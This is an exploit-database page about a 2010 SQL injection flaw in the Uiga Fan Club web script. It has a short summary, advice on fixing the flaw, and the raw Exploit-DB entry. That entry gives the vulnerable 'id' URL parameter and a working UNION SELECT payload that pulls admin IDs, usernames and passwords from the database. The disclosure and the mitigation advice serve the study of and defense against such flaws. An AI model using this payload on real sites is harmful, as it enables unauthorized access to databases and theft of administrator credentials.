header-logo
Suggest Exploit
vendor:
Uiga Fan Club
by:
Sioma Labs
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Uiga Fan Club
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows (Wamp)
2010

Uiga Fan Club SQL Injection Vulnerability

A SQL injection vulnerability exists in Uiga Fan Club, which allows an attacker to execute arbitrary SQL commands on the underlying database. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The vulnerable parameter is ‘id’, which is not properly sanitized before being used in a SQL query. This can be exploited to inject arbitrary SQL commands which can be used to bypass authentication, access, modify or delete data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Uiga Fan Club SQL Injection Vulnerability 
# Date: 22/03/2010 
# Author: Sioma Labs
# Site : http://www.scriptdevelopers.net/products/ufc.html
# Software Link: http://www.scriptdevelopers.net/download/uigafanclub.zip
# Version: N/A
# Tested on: Win (Wamp)
# CVE : N/A

 __ _                           __       _         
/ _(_) ___  _ __ ___   __ _    / /  __ _| |__  ___ 
\ \| |/ _ \| '_ ` _ \ / _` |  / /  / _` | '_ \/ __|
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
                                                   
												   
Exploit : 
http://site/index.php?view=photos&id=[SQLi]


Example : 
http://localhost/uigafan/index.php?view=photos&id=-7 Union Select 1,2,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),4,5 from admin--


#Sioma Labs
#siomalabs.com
#Sioma Agent 154

Navigation

Suggest Exploit

Services By CQR